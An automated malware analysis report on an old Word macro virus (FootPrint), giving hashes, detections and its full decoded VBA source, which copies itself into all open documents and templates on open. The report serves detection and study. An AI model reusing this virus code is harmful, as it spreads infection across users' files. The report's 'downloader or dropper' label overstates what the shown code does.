Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 2dcbe53f232b8a6a…

MALICIOUS

Office (OLE)

Size: 33.0 KB
Created: 1997-09-17 11:18:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: 14ad75f480ef1723b336ec21aa1bf9a9
SHA-1: 1b92e260c3a70163a5ff245bc8775446fc9d9e91
SHA-256: 2dcbe53f232b8a6a286b1d258987342c9291811d210749909b1e807f8aae9e14
Risk Score: 120

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic
T1505.003 Server Software Component: Service Execution

The sample contains VBA macros that trigger on Document_Open. These macros export the current document's VBA project to a temporary file and then attempt to inject code from another temporary file into the current document and other templates. This behavior is indicative of a macro-based downloader or dropper.

Heuristics 3

  • ClamAV: Doc.Trojan.FootPrint-4 [critical] [CLAMAV_DETECTION]
    ClamAV detected this file as malware: Doc.Trojan.FootPrint-4
  • VBA macros detected [medium] [1 related finding] [OLE_VBA_MACROS]
    Document contains VBA macro code
  • Document_Open macro [high] [OLE_VBA_DOCOPEN]
    Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 1504 bytes
SHA-256: 74eb43955704138c9b7603884e2761dbffc60f5d50a97849cdb4cf21724f5dc4
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Option Explicit
Private Sub Document_New()
Document_Open
End Sub
Private Sub Document_Open()
On Error Resume Next
Dim al As String
Dim adoc As Document
Dim atpl As Template
ThisDocument.VBProject.VBComponents("ThisDocument").Export "c:\footprint.$$$"
Open "c:\footprint.$$$" For Input As #1
Open "c:\footprint.$$1" For Output As #2
Line Input #1, al
Line Input #1, al
Line Input #1, al
Line Input #1, al
While Not EOF(1)
    Line Input #1, al
    Print #2, al
Wend
Close 1
Close 2
For Each adoc In Documents
    If Not adoc.CustomDocumentProperties("FootPrint") Then
        adoc.Sections(1).Footers(wdHeaderFooterPrimary).Range.Text = adoc.FullName
        adoc.CustomDocumentProperties.Add Name:="FootPrint", LinkToContent:=False, Value:=True, Type:=msoPropertyTypeBoolean
        adoc.VBProject.VBComponents("ThisDocument").CodeModule.AddFromFile "c:\footprint.$$1"
    End If
Next
For Each atpl In Templates
    If Not atpl.CustomDocumentProperties("FootPrint") Then
        atpl.CustomDocumentProperties.Add Name:="FootPrint", LinkToContent:=False, Value:=True, Type:=msoPropertyTypeBoolean
        atpl.VBProject.VBComponents("ThisDocument").CodeModule.AddFromFile "c:\footprint.$$1"
    End If
Next
End Sub